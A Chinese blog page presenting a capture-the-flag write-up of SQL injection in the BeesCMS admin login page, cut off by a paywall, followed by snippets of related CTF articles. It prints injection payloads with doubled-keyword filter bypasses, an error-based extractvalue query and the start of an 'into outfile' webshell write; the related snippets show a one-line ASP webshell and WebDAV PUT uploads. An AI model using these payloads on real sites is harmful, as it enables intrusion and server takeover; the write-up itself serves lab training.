CTF-BeesCMS系统漏洞分析溯源

最新推荐文章于 2025-05-20 13:28:35 发布
原创 最新推荐文章于 2025-05-20 13:28:35 发布 · 4.8k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了在CTF比赛中针对BeesCMS系统的一个SQL注入漏洞的分析过程。通过御剑工具扫描,确认了/admin/login.php存在SQL注入。通过尝试不同注入方法,成功绕过过滤,利用报错注入获取数据库名,并进一步通过16进制编码绕过写入一句话木马,最终实现远程控制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

根据题意
在这里插入图片描述
漏洞原因:因为BeesCMS后台登陆页面存在sql注入,可以被用来写入一句话木马或者查看管理员密码
进入环境,通过御剑工具扫描网站目录,发现/admin/login.php
在这里插入图片描述
首先在用户名 中 输入 ‘ 出现了报错, 确认后台登陆页面的user 有存在sql注入。
然后输入 ‘ or 1=1 # 就返回了正常的登陆失败的页面。
sql 回显可以看出有五个字段 所以尝试 ‘ union select 1,2,3,4,5 #
但是发现 union 和 select 好像都被过滤了,所以首先尝试复写绕过 uniunionon selselectect
然后发现 select 是可以的 union似乎有点不一样 直接返回了 ununionion 所以试试空格 un union ion
这样是ok的,发现会返回正常的登陆错误的页面了
admin ‘ un union ion seselectlect 1,2,3,4,5 #
既然已经知到闭合结构了 所以开始注入
这里可以发现 注入失败的时候是有回显的 所以我先用报错注入试了一下 发现是可以的 爆出当前数据库
admin ’ a and nd extractvalue(1,concat(1,database()))#
在这里插入图片描述
绕过限制写入文件的注入代码:
Admin’un union ion seselectlect 1,2,3,4,5 in into outoutfilefi

最低0.47元/天 解锁文章

200万优质内容无限畅学
CTF-IIS写权限漏洞分析溯源
asd158923328的博客
08-21 762
根据题意 原因:来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞的iis,此漏洞主要是因为服务器开启了 webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。 用burp抓包修改写入,修改GET为OPTIONS 发现Allow部分有PUT和MOVE 然后利用PUT写入一句话木马到一个文件里面 更改或增加以下 PUT ...
360众测靶场题库之1-BeesCMS系统漏洞
zjl12344的博客
03-03 5669
360众测靶场题库
CTF-日常密码泄露分析溯源
asd158923328的博客
08-24 675
根据题意 进入环境,用御剑扫描出后台登录网页 http://219.153.49.228:42886/admin/index.php 利用社工信息猜测用户名密码,Burp suite 抓包进入爆破,intruder模式下的Cluster bomb爆破 构造用户名和密码 start进行爆破后,找长度不一样的数据,发现账号密码分别为“xiaojun”“xiaohong0214”,查看报文,获...
开源CMS系统中哪些常见的安全漏洞最需要注意?
最新发布
05-20 1033
在数字化时代,开源内容管理系统(CMS)因其灵活性和低成本广受欢迎,但同时也面临诸多安全威胁。本文详细分析了开源CMS中常见的安全漏洞,包括SQL注入、跨站脚本攻击(XSS)、文件上传与目录遍历、权限绕过与越权访问、插件与主题漏洞以及服务端模板注入(SSTI),并提供了相应的防护建议。
BeeS CMS 靶场漏洞攻略
shw_yzh的博客
10-08 1694
密码MD5解密后为admin。
CTF-网络数据分析溯源(查找下载文件的内容)
asd158923328的博客
08-25 1737
根据题意 进入环境,下载文件,用wireshark打开 这一题一开始的思路是通过bindwalk进行分离(题目提示说是下载了zip),但是分离出来之后文件有些损坏只能从其他地方下手 通过使用wireshark导出文件的方式来进行分析导出http流量 导出后会发现有个key.zip下有张图片,将前六个值提交,get到flag ...
CTF-网络数据分析溯源(发布文章的IP地址)
asd158923328的博客
08-22 938
根据题意 进入环境,下载文件,用wireshark加载 根据两个条件发布一篇文章到www.xwast.org上 提高文章采用的协议是post 检索http.host==“www.xwast.org” && http.request.method == POST即可找到ip 得到IP:172.16.129.49在靶场进行验证,获得key ...
CTF-MISC-日志分析.pdf
02-11
CTF-MISC-日志分析
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF-Tools-v1.3.7.zip
01-29
CTF常用工具集
SQL注入讲解-BeesCMS系统漏洞分析溯源
Ryongao
02-06 3045
本文章仅限于网络安全教学,严禁用于非法途径。若有人因此作出危害网络安全行为后果自负,与本人无关。
CTF-网络数据分析溯源(端口扫描的IP地址)
asd158923328的博客
08-25 1607
根据题意 进入环境,下载文件,用wireshark打开 过滤命令进行过滤端口,连接最频繁的就是ip,验证ip得到key
CTF-日志文件分析溯源(爆破者的IP地址)
asd158923328的博客
08-25 2884
根据题意 进入环境,下载文件,用wireshark打开 检索login.php得到ip验证得到key
CTF-网络数据分析溯源(DNS服务器地址)
asd158923328的博客
08-24 2383
根据题意 进入环境,下载文件,用wireshark加载 wireshark筛选udp.port==53或者DNS 使用率最高的就是DNS服务器地址 验证ip获得key
BeesCMS系统漏洞分析溯源
qq_45927819的博客
11-14 5662
先使用御剑扫一波,发现后台登录界面admin/login.php: 用户名一栏输入单引号,发现存在sql注入, 当输入admin’ or 1=1#后又返回正常的报错界面 看来闭合符号为单引号 注入开始: admin' union select 1,2,3,4,5# union 和select被过滤了 既然存在报错信息,我们就尝试报错注入,经过尝试and也被过滤了,and用an and d代替,union用un union ion代替,select用selselectect代替: 报错注入 adm.
CTF-WebShell文件上传分析溯源(第1题)
asd158923328的博客
08-24 956
根据题意 进入环境,进入后台登录,弱口令 admin/admin 进入后台 在添加文章出发现可以上传一句话木马图片 生成一句话木马图片 准备三个文件1.jpg和1.php和1.bat 其中1.php的内容为<%eval request (“cmd”)%> 其中1.bat的内容为copy 1.jpg /b + 1.asp /a asp.jpg 存为1.bat文件 点击1.bat文件,生...
CTF-CMS系统漏洞分析溯源(第3题)
asd158923328的博客
08-22 1151
根据题意 想利用漏洞,我们需要先注册一个用户,在注册信息中想方设法插入我们的一句话木马。点“用户注册”来注册一个用户,“用户名”、“登录密码”、“邮件地址”等都可以随便填写,但“密码问题”需要特别注意,要填写“+撺数畲整煺焕敞蹉V=-|悄”,也就是<% execute request(“a”)%>a经过Unicode转码后的代码。 进入环境,再注册页面提交 问吧数据库的默认地址是问...
CTF-网络数据分析溯源(发送邮件的IP地址)
asd158923328的博客
08-25 2108
根据题意 进入环境,下载文件,用wireshark打开 使用过滤语句,过滤smtp包里含有admin@qq.com的信息 验证ip得到key
Bash漏洞分析溯源
weixin_47493074的博客
10-01 727
Bash漏洞分析溯源
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值